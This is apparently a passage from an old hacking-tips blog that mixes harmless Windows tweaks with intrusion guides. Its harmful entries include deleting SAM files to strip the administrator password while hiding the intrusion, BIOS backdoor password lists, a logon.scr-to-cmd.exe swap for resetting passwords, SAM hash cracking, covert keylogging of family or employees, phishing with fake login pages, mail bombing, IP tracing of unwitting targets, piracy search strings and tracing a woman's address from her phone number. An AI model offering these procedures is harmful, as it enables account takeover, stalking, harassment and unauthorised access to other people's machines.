the following commands:
attrib -a -r -h
copy sam.* a:\
del Sam.*
reboot the computer. there should be no administrator password.
just put in administrator and hit enter. replace the sam files to
restore the password to hide intrusion.
It will not work in Win XP


How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS
Use password cracking software
Reset the CMOS using the jumpers or solder beads.
Removing the CMOS battery for at least 10 minutes
Overloading the keyboard buffer
Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.



Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.



Breaking into Win XP without passwords

Because of the security features built into Windows XP, it is virtually [not actually ] impossible to get back into the system without the password.
You have several options to try and get around this problem.


If you have access to another user account with administrator rights, you can use that account to change the password
of the account that is locked out. You can also use the default Administrator account that is built into Windows XP.

First you need to boot the system into Safe Mode.
1.Restart your system.
2.When you see the blue Dell globe or screen, press the ( F8 ) key about 3 times a second.
3.You should get the Windows startup menu. Use the (Up or Down) arrow keys to highlight (SafeMode)
4.Press (Enter) on (Safe Mode), then press (Enter) on (Windows XP).
5.The system should boot to Safe Mode.

Once you are at the Account Log on Screen, click on the icon
for the user account with administrator rights, or click on the icon
for the administrators account.
Note: For Home the Administrator account isn't normally shown & in Safe Mode you have to press Ctrl+Alt+Delete keys twice to show.
For PRO you can do this in normal mode

When the system has booted to the desktop, use the following steps to change the accounts password.
1.Click Start, Control Panel, Administrative Tools.
2.Click Computer Management.
3.Double click Local Users and Groups, double click the folder Users.
4.Right click on the account name that is locked out, and click on Set Password.
5.You may get a warning message about changing the password, simply click proceed.
6.Leave the New Password box blank, also leave the Confirm Password box blank.
7.Click OK, and OK again.
8.Then close all Windows, reboot the system and try to log in.


Now there are also applications that can recover the password for you.
The following companies provide these applications at a cost.
iOpus® Password Recovery XP here.
LostPassword.com, here.
Asterisk Password Recovery XP v1.89 here.
Windows XP / 2000 / NT Key here.

Now consider a situation, where you have all the user accounts including default 'administrator' account has been kept password protected. Seems like trouble????
Well, don't worry.Soon i will explain to you about ways which enables you to log in through any account you want.Isn't that gr8!!!!!!! Stay tunned...
7:39 PM

Google Search Tricks

0 Comments »
Search Google For Rapidshare Links

If you wanna find some applications, files etc on rapidshare.de via google, do the following.
Paste this into the google search box (not the address bar):
site: rapidshare.de -filetype: zip OR rar daterange: 2453402-2453412
* this searches the site rapidshare.de for any file that has extension .rar or .zip, andhas been indexed between 1-11 February.

try this one:-
dvd site: rapidshare.de -filetype: zip OR rar daterange: 2453402-2453412
* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any application posted with the word dvd in it will be found.

There are mainly three criteria to keep in mind when doing this search.

1. site: your site of choice to search

2. filetype: filetypes you want to search,if you put a "OR" after the first
filetype you can add more.

3. daterange: (start date-end date)
* this uses the "Julian calendar", converter can be found here:
http://aa.usno.navy.mil/data/docs/JulianDate.html


Search Google For Ebook Server

As you know Google.com is the most popular search engine in the world.
Here are some tips to helps you find eBooks with Google:
Find Apache's (default) Index page
Try this query:
+("index of") +("/ebooks"|"/book") +(chm|pdf|zip|rar) +apache

Find a particular eBook file:
Try this query:
allinurl: +(rar|chm|zip|pdf|tgz) hacking


Find Everything uploaded on Rapidshare

Try this search strings in the address bar of your browser. Use your gray cells and play with more combinations of extensions.

All rapidshare.de Downloads:
http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.*+site%3Arapidshare.de

Apps Rapidshare.de Downloads:
http://www.google.com/search?hl=en&lr=&as_qdr=all&q=.cab+OR+.exe+OR+.rar+
OR+.zip+site%3Arapidshare.de&btnG=Search

Movies rapidshare.de Downloads:
http://www.google.com/search?hl=en&lr=&as_qdr=all&q=+.Avi+OR+.mpg+OR+
.mpeg+site%3Arapidshare.de&btnG=Search


Utilizing search engines

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.
I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and
http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"
A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.
intitle:"index of" "google hacks" ebook


Search a specific site

Imagine that when you enter any web site, and you are surprised that when searching for any program in it you can not find it. By this fabulous trick, you can find the link for downloading any program in this site through any search engine.

For example, suppose you want to search for the program "Norton" in the web site www.download.com ; when you go to www.google.com and write the following code, you will be surprised that the "Google" search engine searches only in the site www.download.com. To do this:

Write in the address bar of the web browser this address: www.google.com.
When opening the web site; write in the search engine this code: "norton site: www.download.com", and press the button search.
As mentioned earlier: the code is easy, you just write in the place of the word "Norton"; any word you need to search for in the site followed in the code.
The code again is....
norton site:www.download.com

By the way, you can practice this code at any search engine.
Another trick is that you can force the search engine of the "Google" web site to search for a certain category like "Linux" topics. When you add any category after the Google link and write any thing in the search engine, you will surprised that the site searched for Linux only. For example, if you wrote the following code:
http://www.google.com/linux
As I mentioned in the code earlier, the site followed by the word "Linux". So the web site is forced for searching for the Linux topics only all over the internet.


Google Crack Search

just type crack: app name
example: crack: flashget 1.6a
http://www.google.com/search?hl=en&lr=&amp;amp;ie=UTF-8&q=crack%3A+flashget+1.6a

Happy cracking!!!!!!


Google secrets

method 1
?ww.google.com
put this string in google search:
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums

Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.

OR

method 2
?ww.google.com
put this string in google search:
?intitle:index.of? mp3

You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson

If you wanna find some apps, files etc on rapidshare.de via google, do the following.
Paste this into the google search window (not the adress bar):
site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412

* this searches the site rapidshare.de for any file that is rar or zip, and
has been indexed between 1-11 February.

dvd site:rapidshare.de -filetype:zip OR rar daterange:2453402-2453412

* this is the same search but it specifically searches for "dvd" with the same
search criteria, so any app posted with the word dvd in it will be found.

There are mainly three criteria to keep in mind when doing this search.

1. site: your site of choice to search

2. filetype: filetypes you wanna search,if you put a "OR" after the first
filetype you can add more.

3. daterange: (start date-enddate)

* this uses the "julian calendar", converter can be found here:

Code:
http://aa.usno.navy.mil/data/docs/JulianDate.html

Google Talk Tricks

0 Comments »
Google Talk Tricks

Some people say Google Talk is nice because of its minimalistic design, but they coudn't use an Instant Messenger that doesn't have smileys and font customization. Here are some tips that will make your work with Google Talk better.

Keyboard shortcuts

* CTRL + Mousewheel up/down: Change the font size in a conversation window.
* CTRL + E: Center text
* CTRL + R: Right justify text
* CTRL + L or CTRL+J: Left justify text
* F9: Open Gmail to send an email to the person you talk to
* F11: Start a call
* F12: Stop the current call
* ESC: Close the current window

Conversation

* Some smileys are converted by Google Talk: :-| :-O :-x :-P :-D ;-) :-( :-) B-) :'( :| :O :x :P :D :) :( :)
* To write bold text, type *your gtalk message*
* To write italic text, type _your gtalk message_

Startup parameters (go to Start/Run and type "c:\Program Files\Google\Google Talk\googletalk.exe" /one_parameter_from_the_list_below)

* /nomutex: allows you to open more than one instance of Google Talk.
* /register: write Google Talk settings in the registry.
* /checkupdate: check for new version.
* /factoryreset: revert to default settings.
* /mailto email@gmail.com: send an email with Gmail.
* /diag: start Google Talk in diagnostic mode.

Hacking Gmail

0 Comments »


The first book to unlock the true power behind Gmail, Hacking Gmail will immediately appeal to Google and Gmail fans This is serious, down-and-dirty, under-the-hood, code-level hacking that will have readers eliminating the default settings, customizing appearance, disabling advertising, and taking control over their Gmail accounts Covers turning Gmail into an online hard drive for backing up files, using it as a blogging tool, and even creating customized Gmail tools and hacks Shows readers how to check their Gmail without visiting the site; use Gmail APIs in Perl, Python, PHP, and other languages, or create their own; and maximize Gmail as a host for message boards, photo galleries, even a blog.

TYPE : PDF
LANG : English
PAGE : 310
Download Size 2.74 MB

This file is password protected. Request me for password through comment
http://rapidshare.com/files/30336507/Hacking_Gmail_2006.rar


3:33 PM

Remove Brontok Virus Urself

0 Comments »
Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-

reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"

after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run

on the right side delete the entries which contain 'Brontok' and 'Tok-' words.

after that restart ur system
open registry editor and follow the path to enable folder option in tools menu

HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer

and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.
7:31 PM

Shutdown Your PC in 3seconds

0 Comments »
You can shutdown your computer within 3seconds.. yes it is possible.. simple trick
follow the steps:

1.press Ctrl+Alt+Del. It opens task manager.

2.Go to shutdown Tab.

3.Now Press and HOLD Ctrl key and then click TURN OFF option.

NOW YOUR COMPUTER WILL TURN OFF WITHIN FEW SECONDS
7:05 PM

Change the Windows XP Start Button

0 Comments »
First you need to download a program called Resource Hacker.
http://www.angusj.com/resourcehacker
We will need it because we will be editing and compiling explorer.exe which is a binary file within Windows. Here’s a brief description from their site:
Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.
Backup explorer.exe
First things first, lets make a backup copy of the original explorer.exe file. We need to navigate to you Windows installation directory, type (Windows Key+R), then:
C:\Windows
Look for the file explorer.exe, it might make it easier to find if you sort the window by file type (click the “Type” label near the top of the window).

Make a copy of this file and place it in a safe place, like your desktop.
Edit explorer.exe
Run Resource Hacker and open the original explorer.exe file (File -> Open -> c:\windows\explorer.exe). Click on “String Table” and expand by clicking the plus sign. Then, expand folder 37 (38 if you are using the Classic Windows theme) and highlight 1033.

In the right windows, highlight “start” and change it with any words that you like, e.i. Begin. Make sure you type the words between the quotes leaving the quotes in place!!.
Now compile the script by clicking on Compile Script button.

Now save the file with a new name (File -> Save As). Name it something like newexplorer.exe. Save it in C:\Windows.
Editing The Registry
Now we need to modify the registry. Run Registry Editor (START-RUN-regedit-OK). Now navigate to:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

In the right panel, double click “Shell”. In Value data field, type the name of the modified explorer.exe (newexplorer.exe) and click Ok.
Close Registry Editor and logoff or restart your computer. If everything works fine, your Start button will be changed! SEE VIDEO TUTORIAL
6:47 PM

Chat With Command Prompt

0 Comments »
If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!
6:47 PM

create a shutdown/restart shortcut on your desktop !

0 Comments »
Instead of going all the way, clicking Start>Turn Off Computer and
selecting Shutdown or Restart, create their icons on your desktop :

create a SHUTDOWN ICON like this :
Right click on an empty area on your desktop.
Select New>Shortcut.
In the first box of the Create Shortcut Wizard, type : Shutdown -s -t 00
Click Next.
Name the shortcut : Shutdown , and click Finish.
Then select an appropriate icon for it !

Similarly create a RESTART icon but follow the folowing step instead :

In the first box of the Create Shortcut Wizard, type : Shutdown -r -t 00
Click Next.
Name the shortcut : Restart , and click Finish.
6:46 PM

create a shutdown/restart shortcut on your desktop !

0 Comments »
Instead of going all the way, clicking Start>Turn Off Computer and
selecting Shutdown or Restart, create their icons on your desktop :

create a SHUTDOWN ICON like this :
Right click on an empty area on your desktop.
Select New>Shortcut.
In the first box of the Create Shortcut Wizard, type : Shutdown -s -t 00
Click Next.
Name the shortcut : Shutdown , and click Finish.
Then select an appropriate icon for it !

Similarly create a RESTART icon but follow the folowing step instead :

In the first box of the Create Shortcut Wizard, type : Shutdown -r -t 00
Click Next.
Name the shortcut : Restart , and click Finish.
6:46 PM

Hacking Windows XP Password

0 Comments »
1. Restart you computer

2.When booting, press F8 and select "Safe Mode"

3.After getting to the user menu. Click on a user and
this time it will not ask you for a password

4.Go to Start>Run and type "CMD" (without the quotes).

5.At command prompt type in "cd C:Windows\System32"
(without the quotes), I am assuming C is your System/Windows Drive

6.For safety purposes first make a backup of your Logon.Scr file..
You can do this by typing in "Copy to Logon.scr to Logon.bak" (without the quotes)

7.Then type "copy CMD.EXE Logon.scr"(without the quotes)

8.Then type this command, I will assume that you want to set Administrator's password
to "MyNewPass" (without the quotes)

9.Now, type this in (I am assuming that you are still in the directory C:WindowsSystem32) ,
"net user administrator MyNewPass" without the quotes

10. You will get a message saying that it was successful, this means Administrator's new password is "MyNewPass" (without the quotes)

11. Restart the PC and you will login as Administrator (or whatever you chose to reset) with your chosen password
6:40 PM

Change your PC to morning alarm

0 Comments »
Now this is specially for the ones who are too lazy to get up even when the trust cellphone dies screeching its lungs out.
Its pretty simple

Creating the playlist
create a playlist of your favourite songs in Winamp, WMP or any other player. Export the playlist as a M3U playlist. M3U is generally accepted by almost every player.

Triggering the alarm
point to start> programs >accessories > system tools >scheduled tasks
Create a new task and choose program as windows media player or winamp (May work with others too but I haven't tried anything else)
Choose "daily", Enter the time and choose "every day" at next screen.
It would now ask for password (leave blank in case you don't have one)
Right click on the newly created task and check the "run only if logged in" check box. In the properties. Append the path to the playlist you created in the "run" text box. "D:\windows media player\wmplayer.exe" K:\Playlists\smoothies.m3u
It should now look like the text inside quotes is my WMP's path. It may vary for you. The text after WMP's path is the one to the playlist.
Click OK and you're done.
6:22 PM

Desktop Hacking

0 Comments »
Multiple Google Talk

Now it's turn to use multiple google talk. Previously we covered that how to run multiple Yahoo messenger using Yahoo Pal!.

Well for google talk, you don't have to download any software. Just follow the following simple steps.

1) Create a Shortcut on ur Desktop.

2) In the field 'type the location of the item' paste the following source...

c:\program files\google\google talk\googletalk.exe" /nomutex

3)If this loction doesn't work, then locate manually by clicking on browse option. Then go to c: -> program file -> google-> google talk->googletalk.exe

and then paste /nomutex in the end of manually located source.

Finished. Now you can run multiple Google Talk.

........................................................................................................
Yahoo Pal!

Yahoo! Pal is an invisible program, it will automatically attach to running Yahoo! Messenger and new Yahoo! Messengers you run after Yahoo! Pal, and add menu bar to the Yahoo! Messenger windows. You can also quit it by clicking its menu.

∙ Allow multiple accounts on the same computer.

∙ Automatically reply when you are away.

. Send a random quote to your friend.

∙ Hotkey to hide Yahoo! Messengers windows.

CLICK HERE TO DOWNLOAD.
http://216.219.88.102/dh/downloady1.html
........................................................................................................

BIOS PASSWORD HACK

To perform this hack you will need:

A #1 or #2 Phillips-head screwdriver, or (less likely) a T-15 TORX driver or a 1/4" hex nutdriver, to open the case

Needle-nosed pliers if you are working with jumpers

A small flashlight or headlamp

With tools at hand, perform the following steps:

Turn the PC off (this means a total shutdown, not merely standby or hibernate mode) and disconnect the AC power cord.

Remove the cover from your system (this step may require tools, undoing a thumbscrew, or flipping a latch or two).

Refer to the user manual for the motherboard to find out how to "reset CMOS" memory. You may also find a label for specific jumper or switch settings marked on the system board.

Change the switch setting or jumper position to a specific position or remove the jumper entirely as prescribed in the manual to clear or reset the CMOS memory.

Wait 20-30 seconds for the memory to clear out from lack of power.

After 20-30 seconds put the switch or jumper the way it was before for normal use.

Reconnect the power cord and start up the system to see if the settings have changed to defaults.

Shut the PC down, disconnect the power cord, replace the cover, reconnect the power, and power up the PC.

Enter the BIOS setup program to configure the system as needed. This may include setting the date and time, selecting disk drive parameters, and selecting which devices the system uses to boot up with first.

If your system does not have a "reset CMOS" jumper or switch , the only option is to locate and remove the coin-style battery cell (or on some very old PCs, the battery pack), as shown in , that provides the power to the CMOS memory.

SOURCE : http://www.oreilly.com/pub/h/2245

.........................................................................................................
HACKING WINDOWS LOGON PASSWORD / SAM FILE ( Windows NT/2000/XP/2003 )

SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

-What are password Hashes?

Actually when we enter password in Windows Logon Tab, Windows encrypts our password using an encryption scheme that turns our password into something that looks like this:


65464564s1d4d2c9a56s42166d55se

SAM file can be found under C:(default OS drive) -> WINNT -> System32 -> Config -> SAM.

SAM file can be cracked by sing a simple freeware software "SAMInside".

Troubleshooting : While copying SAM file it shows an error of "Access Denied" or "File in Use". Actually copying of SAM file is restricted by Windows.

There are many alternatives to copy SAM file.

[1] You can boot your system by a Live Linux CD such as Knnopix or Fedora. Linux has access to all Windows Files. This way SAM file can be easily copied.

.........................................................................................................
KEY LOGGER

If you want to know what other users are typing on your machine, this heavy weaponry addition to your Spy Arsenal will allow you to know everything! Simply install Family Key Logger, set the 'Start in hidden mode' and 'Remove from tasks list' options and you are ready to go. The program will reside in memory while being absolutely invisible to everyone except you. You will only have to press the Unhide key combination on the keyboard to see what your kids or your wife or your employees were typing.
And remember:

You have the right to know!
Source : http://www.spyarsenal.com/
.........................................................................................................

SPEED UP XP BOOTING

Start Registry Editor (Regedit.exe).

Locate the following key in the registry:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Ses

sionManager\MemoryManagement\PrefetchParameters

Make sure you backup the keys by exporting them to a .reg file.

On the EnablePrefetcher value, change the setting from 3 to 5 (decimal).

Close the registry editor.

Restart your computer.
12:30 PM
0 Comments »
Fake Login Pages (for hacking Email accounts)

Fake Login pages are one of the BEST method to Hack an Email account.

Now it's easy to build Fake login Pages without any knowledge of Programming lanuages. One can use http://www.jotform.com to build the Signup page.

Rest of the things required to bulid a fake login page are easy to learn.

Example of a fake login page is displayed below.

http://216.219.88.102/demo_fakeloginpage.html

Don't forget to decorate your fake login page to express the delusion.

........................................................................................................
Tracing IP Address (Remote Tracing)

Did you ever want to know the location of the person whom you are chatting/talking to (on Yahoo!, MSN, ICQ messenger) or with whom you are transacting with on Internet.
Did you ever want to know the Country, City, Latitude, Longitude, Browser any person is using, Operating System he is working on. You can know it all here !!
This is a system to trace the location (country, city, etc. ) and also browser and OS of anyone on internet.

All you need to do is to invite that person (whom you want to trace) to a page and all his details will automatically get mailed to you at your Email Address that you provide here.
After you provide your email id here, a unique link will be mailed to you at which you'll have to invite your target. As soon as the person clicks that link, his location details will be mailed to you.

TRY THIS HERE....


Wanna know your own IP ? , just open the site http://www.showmyip.com

........................................................................................................
MAIL BOMBER

Mail Bomber is a professional email software, mass mailer, bulk mailer intended for fast sending personalized emails and mailing list management. It allows you to organize email-based subscription on your web site and to send newsletters, information and notifications to a large number of recipients. You can send thousands of spam mails in single click. It allows you to fill the victims E-Mail box full with spam messages.There are thosands of Mail Bomber available on internet for free.

Source : http://www.softheap.com/bomber.html

http://www.freedownloadmanager.org/downloads/mailbomber_software/

......................................................................................................
CRACKS FOR ALL

Use this link http://216.219.88.102/cracks.html to find cracks for anything you want ( like for games, softwares, websites etc...)

Note : The above link do NOT contains any kind of VIRUS.

......................................................................................................
Phone Number's Address [Valid only for India (for only BSNL landline numbers]

Wanna know Address of the girl you like?, or address of your friend?. It is so easy to trace the addresses, just you need is their phone number.

EXAMPLE: For tracing the address of a number loacated in Madhya Pradesh (India) just log in to http://www.bsnl.co.in/onlinedirectory.htm

After logging in, select the area(city) to which the phone number belong and then proceed further.

In the option "Search by" , select Telephone number. select the station to which the phone no. belongs and finally write the phone number in the "Search key field" . In this way the address of that particular number will be traced.

For selecting any other state of India, log on to http://www.bsnl.co.in/index.html . In the Right hand side you see the "BSNL units" option(above Username field), select your state from the menu and then proceed further.

NOTE : Try both, number including (2) as well as number excluding (2) as a perfix.

Source : http://www.bsnl.co.in/

....................................................................................

BROWSE RESTRICTED WEBSITES (Using proxy Server)

http://www.mathtunnel.com

Rapidshare & Megaupload hacking

0 Comments »
This is for those who have to wait for about an hour after downloading certain amount of stuff from rapidshare.To overcome this time constraint follow these steps:

RAPIDSHARE

Method 1
1.open your rapidshare link
2.then click on free.
3.As soon as timer start type this in adress bar and click enter
javascript:alert(c=0)
